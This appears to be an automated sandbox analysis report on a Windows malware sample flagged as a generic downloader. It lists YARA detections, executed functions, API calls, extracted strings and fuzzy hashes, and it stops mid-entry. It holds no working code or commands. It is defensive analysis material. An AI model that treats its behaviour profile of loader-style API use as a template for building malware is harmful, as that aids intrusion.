Yara matches:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	86.5%
Signature Coverage:	7%
Total number of Nodes:	1227
Total number of Limit Nodes:	92

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

E, xrefs: 00401E0F
., xrefs: 0040201F
D, xrefs: 00401DFB
4, xrefs: 00401B64
', xrefs: 00402006
___, xrefs: 0040227D
{, xrefs: 00401B4B
[, xrefs: 00402047
U, xrefs: 004020F5
V, xrefs: 00401E19
), xrefs: 0040202E
x, xrefs: 0040214A
0, xrefs: 00401BBD
[, xrefs: 00401B37
W, xrefs: 00402033
:, xrefs: 00401B28
., xrefs: 00401B0A
h, xrefs: 00401A6F
!, xrefs: 004020CF
x, xrefs: 00401E69
!, xrefs: 0040201A
6, xrefs: 004020C5
W, xrefs: 004020E6
v, xrefs: 00401E4B
4, xrefs: 00402074
*, xrefs: 004020E1
5, xrefs: 00402109
%, xrefs: 004020FA
x, xrefs: 00401B78
', xrefs: 00401AF6
o, xrefs: 00401B8D
_._, xrefs: 00402257
x, xrefs: 00402088
v, xrefs: 0040212C
*, xrefs: 00401A1F
{, xrefs: 00401E3C
v, xrefs: 00401B5A
o, xrefs: 00402097
W, xrefs: 00401B23
", xrefs: 00401B0F
{, xrefs: 0040205B
4, xrefs: 00402136
8, xrefs: 00401BA9
o, xrefs: 00402159
V, xrefs: 00402038
W, xrefs: 00401B14
{, xrefs: 0040211D
!, xrefs: 00401B1E
v, xrefs: 0040206A

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 2366190142-2962942730
Opcode ID: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 05A37008 Relevance: 24.8, Strings: 19, Instructions: 1024
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'Gq, xrefs: 05A37039
>, xrefs: 05A37B6B
c, xrefs: 05A37A46
|, xrefs: 05A37787
\, xrefs: 05A37909
?, xrefs: 05A37B75
>, xrefs: 05A3777D
>, xrefs: 05A378FF
, xrefs: 05A3746F
i, xrefs: 05A37468
;, xrefs: 05A37CD4
F, xrefs: 05A37C7D
*, xrefs: 05A37631
i, xrefs: 05A377EE
;, xrefs: 05A37AAD
, xrefs: 05A377F8
), xrefs: 05A37E96
|, xrefs: 05A37413
8, xrefs: 05A375C0

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: $ $ 'Gq$)$*$8$;$;$>$>$>$?$F$\$c$i$i$|$|
API String ID: 0-2839787044
Opcode ID: 66b83e448cf826b066923735d005b046012bebf69b61312dda9ffb1b90c4bbcc
Instruction ID: 5975dfb421f1c08687797f25aa63a147d55cfffbd119be8dd33d8cfe20adddc1
Opcode Fuzzy Hash: 66b83e448cf826b066923735d005b046012bebf69b61312dda9ffb1b90c4bbcc
Instruction Fuzzy Hash: 4CA20634A10A14CFCB25EF74C958BDAB7B2BF89304F1045A9E14AAB360DB35AD85CF51

Function 05A37018 Relevance: 24.8, Strings: 19, Instructions: 1018
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'Gq, xrefs: 05A37039
>, xrefs: 05A37B6B
c, xrefs: 05A37A46
|, xrefs: 05A37787
\, xrefs: 05A37909
?, xrefs: 05A37B75
>, xrefs: 05A3777D
>, xrefs: 05A378FF
, xrefs: 05A3746F
i, xrefs: 05A37468
;, xrefs: 05A37CD4
F, xrefs: 05A37C7D
*, xrefs: 05A37631
i, xrefs: 05A377EE
;, xrefs: 05A37AAD
, xrefs: 05A377F8
), xrefs: 05A37E96
|, xrefs: 05A37413
8, xrefs: 05A375C0

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: $ $ 'Gq$)$*$8$;$;$>$>$>$?$F$\$c$i$i$|$|
API String ID: 0-2839787044
Opcode ID: 2ac4982f2a9a697d559c7b303975ff2aaeeb0a50121a2e41beb79cd60c71de27
Instruction ID: 2c7eaaccdf3446a4bf96e70101026f5f0d424f0d7fe04f524ba06b32b5cf6b39
Opcode Fuzzy Hash: 2ac4982f2a9a697d559c7b303975ff2aaeeb0a50121a2e41beb79cd60c71de27
Instruction Fuzzy Hash: 7EA20634A10A14CFCB25EF74C958BDAB7B2BF89304F1045A9E14AAB360DB35AD85CF51

Function 06AD3EE0 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCapture.USER32 ref: 06AD4037
GetActiveWindow.USER32 ref: 06AD40AF

Strings

Hq, xrefs: 06AD4459
Hq, xrefs: 06AD439E
fXV, xrefs: 06AD3F10

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: ActiveCaptureWindow
String ID: Hq$Hq$fXV
API String ID: 2424615356-273469375
Opcode ID: 2e0d430939a07e78976c7d90f5207d8c045ca958a8edb9db3e34f6f7f8d1b4e3
Instruction ID: 829bf2e07347dec719d8007be3b744a26ae41286c93c701723e60b74cb90ea8f
Opcode Fuzzy Hash: 2e0d430939a07e78976c7d90f5207d8c045ca958a8edb9db3e34f6f7f8d1b4e3
Instruction Fuzzy Hash: E8121C70E002088FDB65EFB5D554BAEB7F2AFC9200F24816AD506AB395DF349D42CB51

Function 06AD3ED0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCapture.USER32 ref: 06AD4037
GetActiveWindow.USER32 ref: 06AD40AF

Strings

fXV, xrefs: 06AD3F10

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: ActiveCaptureWindow
String ID: fXV
API String ID: 2424615356-3172339192
Opcode ID: 0a285953b8622942b4a011e4b292e4e607de47ca10f2cf20db7baf7dff6595a8
Instruction ID: 17cfc8f741ab1bfacafe9f4ff83c6d5751e8332c8a2bf18038cedef564bb3563
Opcode Fuzzy Hash: 0a285953b8622942b4a011e4b292e4e607de47ca10f2cf20db7baf7dff6595a8
Instruction Fuzzy Hash: BFD11B75E00208CFDB65EFB5CA44A9DBBF1EF89304F258269E506AB251DB31A985CF10

Function 0B332790 Relevance: 5.3, Strings: 4, Instructions: 267COMMON

Download Yara Rule

Strings

Hq, xrefs: 0B332905
(q, xrefs: 0B3328D9
, xrefs: 0B33282C
(&q, xrefs: 0B332A61

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: $(&q$(q$Hq
API String ID: 0-2282635851
Opcode ID: 35ba06cced9c62c67081c5ff5262090d583a087952cfe32b402e17052a53b612
Instruction ID: 0ab928c348ec42edb9cf99d1e3a9ce3283ed16543f668d831b3b2c88f0b08d13
Opcode Fuzzy Hash: 35ba06cced9c62c67081c5ff5262090d583a087952cfe32b402e17052a53b612
Instruction Fuzzy Hash: 4A918F71E002199FDB18DF75D854AAFBBF6EFC8B10F24842AE405EB254DB359941CBA0

Function 0B33B480 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(00000000), ref: 0B33B91F

Strings

fXV, xrefs: 0B33B4C6

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID: BrushColor
String ID: fXV
API String ID: 464657469-3172339192
Opcode ID: cbb3c8d6a5f5903df9f447b0b746c1f642753d270536e5c4bb2cfb94cbac0659
Instruction ID: fcb17903c898e875af6f2e9b894e42ce59ec618797cf7acd8a0cc7787d89a12a
Opcode Fuzzy Hash: cbb3c8d6a5f5903df9f447b0b746c1f642753d270536e5c4bb2cfb94cbac0659
Instruction Fuzzy Hash: 2D322835900619CFCB21DF64C994BDAF7B1FF89700F1585E9E409AB261EB71AA85CF40

Function 0A30F6C0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

fXV, xrefs: 0A30F6EA

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: fXV
API String ID: 0-3172339192
Opcode ID: 3c8010318f0af0f7eb92b3081bdcd26ee5730996bb9b0d7baf8f244724f094db
Instruction ID: a71d1e2fd904bacb459e418bdd7b414fc12ad87566348d7208ce41f7ea9621ac
Opcode Fuzzy Hash: 3c8010318f0af0f7eb92b3081bdcd26ee5730996bb9b0d7baf8f244724f094db
Instruction Fuzzy Hash: 0CF12834E002099FDB24DFA9C964BADBBF2BF88314F158559E405AF2A5DB70E945CF80

Function 024E2A16 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

`Qq, xrefs: 024E308E
PHq, xrefs: 024E326D

Memory Dump Source

Source File: 00000000.00000002.2481362069.00000000024E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: PHq$`Qq
API String ID: 0-577899614
Opcode ID: dae5e96532b877ce796ac8f3d7925d9b3a8b36b467959294c7b315e83c3e60f7
Instruction ID: 84c0d2df045b88a066e96286940f1df09c70ed93d2e5871a43e259ce48dfaac5
Opcode Fuzzy Hash: dae5e96532b877ce796ac8f3d7925d9b3a8b36b467959294c7b315e83c3e60f7
Instruction Fuzzy Hash: 8E713931E042298FEF259F64D8487A9BBB2EF88301F0545EAD80AE7780DB759D91CF45

Function 0B33839F Relevance: 2.0, Strings: 1, Instructions: 700COMMON

Download Yara Rule

Strings

fff?, xrefs: 0B338A81

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: a9c21eb4956dfbc969fac30a9cdc18b8298702111b200c42c0ed41805c4867f5
Instruction ID: 9a603144a61f4dbb9fbd3a309ade8a07e92c00d3820aba8a680177b1b6912be4
Opcode Fuzzy Hash: a9c21eb4956dfbc969fac30a9cdc18b8298702111b200c42c0ed41805c4867f5
Instruction Fuzzy Hash: 4D62083680061ADFCF11DF60C884ADAB7B2FF99300F1586D5E9086B165EB71AAD5CF80

Function 0A301040 Relevance: 1.8, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

LRq, xrefs: 0A3016B5

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 71b428a174a105573266d89330bb2cacfcbcd6d7790f439eabcd68af07eea2be
Instruction ID: b8ff0eded3c3c2df6f2fb46e8a22f39b59bf84114414f233f86b9bad411cc0a6
Opcode Fuzzy Hash: 71b428a174a105573266d89330bb2cacfcbcd6d7790f439eabcd68af07eea2be
Instruction Fuzzy Hash: 8932FA74A002188FDB58DF29C865BDE77F2AF88700F1481E9D50A9B395DF349D828FA1

Function 0A301D45 Relevance: 1.8, Strings: 1, Instructions: 536COMMON

Download Yara Rule

Strings

4'q, xrefs: 0A30259F

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: b4686c1a3f9f743c28693ec5ab2ca712c46dce824dfb119cef897f61bcba3fab
Instruction ID: 6e3dca2c48a7911f5392889e24d965a71aa0e4270ae8979c067128fb28fbcc6a
Opcode Fuzzy Hash: b4686c1a3f9f743c28693ec5ab2ca712c46dce824dfb119cef897f61bcba3fab
Instruction Fuzzy Hash: 3B42D734A002188FCB18DF24C999FE9B7F2BF89705F1541E9E509AB365DA31AD81CF61

Function 0A302CB8 Relevance: 1.7, Strings: 1, Instructions: 421COMMON

Download Yara Rule

Strings

, xrefs: 0A3043B6

Memory Dump Source

Source File: 00000000.00000002.2492937058.000000000A300000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a300000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 47735db7364dee63f970e12d18f4851f639b9321d6fc707c8485911f9060376c
Instruction ID: 805e4da179f7d286c930c0113ad0580b04b6fd1b5f8ba16cc4869ec8f5df7e68
Opcode Fuzzy Hash: 47735db7364dee63f970e12d18f4851f639b9321d6fc707c8485911f9060376c
Instruction Fuzzy Hash: 69020A31E103198FDB54EFA4C864B9DB7B6AF88300F10869AD519BB291DF70AE85CF50

Function 0B337720 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2493178488.000000000B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b330000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479fa588c5d0e0efe487b7c49f03b61fc6bcf8c278eb45548918d3c1bd43a6ec
Instruction ID: b308d8b1f7de8f6ff58d97e2a9a43a1368f40cba10064a160143c0886c21f9f8
Opcode Fuzzy Hash: 479fa588c5d0e0efe487b7c49f03b61fc6bcf8c278eb45548918d3c1bd43a6ec
Instruction Fuzzy Hash: FF523835A00619CFCB25DF65C844AEAB7B1FF49700F2586D9E419AB261EB31EE85CF40

Function 0BB82CD0 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2493230237.000000000BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb80000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9eea3dbad69d6de8f1cb702cf79304b4d64bd2152fcb073dafaa403f3d1d34
Instruction ID: 22455c2e79e56e0795dac2b829454ed6d8d32975d3d222758e83c39aa82474da
Opcode Fuzzy Hash: 7e9eea3dbad69d6de8f1cb702cf79304b4d64bd2152fcb073dafaa403f3d1d34
Instruction Fuzzy Hash: 32D19A71B006048FEB29EB75C550BAFB7F6EF89600F1444ADD15ADB2A0DB35E806CB61

Function 05AACD38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05AACDB6
GetCurrentThread.KERNEL32 ref: 05AACDF3
GetCurrentProcess.KERNEL32 ref: 05AACE30
GetCurrentThreadId.KERNEL32 ref: 05AACE89

Strings

fXV, xrefs: 05AACD54

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: fXV
API String ID: 2063062207-3172339192
Opcode ID: e1b9fb6a6a9df995ff8d7e79a73d3c6a2fa6cb2d3c5d0c6e82a65883fa4c6629
Instruction ID: 8ed2d1713cd4512fd5bf239c1edf37b9c6e531aa4858065431cf3b08eadb0d78
Opcode Fuzzy Hash: e1b9fb6a6a9df995ff8d7e79a73d3c6a2fa6cb2d3c5d0c6e82a65883fa4c6629
Instruction Fuzzy Hash: D15127B1D003498FEB14DFAAD648BAEBBF1BF88314F24845AE019A7361D7346944CF65

Function 05AACD28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05AACDB6
GetCurrentThread.KERNEL32 ref: 05AACDF3
GetCurrentProcess.KERNEL32 ref: 05AACE30
GetCurrentThreadId.KERNEL32 ref: 05AACE89

Strings

fXV, xrefs: 05AACD54

Memory Dump Source

Source File: 00000000.00000002.2490481036.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5aa0000_BaGkRDSifo.jbxd

Similarity

API ID: Current$ProcessThread
String ID: fXV
API String ID: 2063062207-3172339192
Opcode ID: d1d734b077bf54d51ea486ec754b44e8cb5e3e124dac4c63d73623caa78e37dd
Instruction ID: e393841ace76b9c24d82004fa68da45df482e2989c1fa960d4b4f242f23d1abe
Opcode Fuzzy Hash: d1d734b077bf54d51ea486ec754b44e8cb5e3e124dac4c63d73623caa78e37dd
Instruction Fuzzy Hash: 115166B09003498FEB15CFA9E648B9EBBF1BF48314F20845AE019AB361D7346944CB69

Function 05A33688 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

fXV, xrefs: 05A3369F

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID:
String ID: fXV
API String ID: 0-3172339192
Opcode ID: 1e43268daa2dd7fe1f9de18688b4609acab440f5d2f0c8f2aafd881192c12db4
Instruction ID: 40350169b634a303e7f02ef1afd83e495407b130e21ce24e0f611a1d12438f38
Opcode Fuzzy Hash: 1e43268daa2dd7fe1f9de18688b4609acab440f5d2f0c8f2aafd881192c12db4
Instruction Fuzzy Hash: E8225D74F08605CFDF54DB58C58ADBEBBB2BB88318F248456F926AB364C7349881CB51

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 06ADDD8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPrivateProfileStringA.KERNEL32(?,?,?,00000000,?,?), ref: 06ADE07E

Strings

fXV, xrefs: 06ADDDF2
fXV, xrefs: 06ADDDC3

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: PrivateProfileString
String ID: fXV$fXV
API String ID: 1096422788-1107164591
Opcode ID: 74d9b95b8566a06e6893fa6b289bf7f0f34e60f827e158189b5dab81d22c3eee
Instruction ID: 1221579ea9a54804595438c2b22b8364826fa2e27fadd49d187743503905219b
Opcode Fuzzy Hash: 74d9b95b8566a06e6893fa6b289bf7f0f34e60f827e158189b5dab81d22c3eee
Instruction Fuzzy Hash: 71C19070D002198FDB54EFA9C8857AEFBF2FF49300F148529E856EB284DB749981CB91

Function 06ADDD98 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPrivateProfileStringA.KERNEL32(?,?,?,00000000,?,?), ref: 06ADE07E

Strings

fXV, xrefs: 06ADDDF2
fXV, xrefs: 06ADDDC3

Memory Dump Source

Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd

Similarity

API ID: PrivateProfileString
String ID: fXV$fXV
API String ID: 1096422788-1107164591
Opcode ID: 3791ef0d90a4e14f0bb8ecca719305da3800b5e4d042f52917c3a7b52fade02d
Instruction ID: cc807813ccb323c26011b12edebedd61a77c144d9f6144545dce97d430e6a2b0
Opcode Fuzzy Hash: 3791ef0d90a4e14f0bb8ecca719305da3800b5e4d042f52917c3a7b52fade02d
Instruction Fuzzy Hash: 70C19170D002198FDB54EFA9C9817AEFBF2FF48300F148569E856EB284DB749981CB91

Function 05A31CE7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A31E02

Strings

fXV, xrefs: 05A31D3E
fXV, xrefs: 05A31D1E

Memory Dump Source

Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd

Similarity

API ID: CreateWindow
String ID: fXV$fXV
API String ID: 716092398-1107164591
Opcode ID: 4e91f3330116856f3fa64890946055e3f4df4433de9b9956d30b013ae891de4f
Instruction ID: 2fe0940712894e8eb7664baee2b233357406f4b624daf4d236815eaf2d2de747
Opcode Fuzzy Hash: 4e91f3330116856f3fa64890946055e3f4df4433de9b9956d30b013ae891de4f
Instruction Fuzzy Hash: FF41DEB1D003089FDF14CFA9C985ADEFBB1BF48304F64812AE819AB250D7759885CF94

Function 05A31CF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

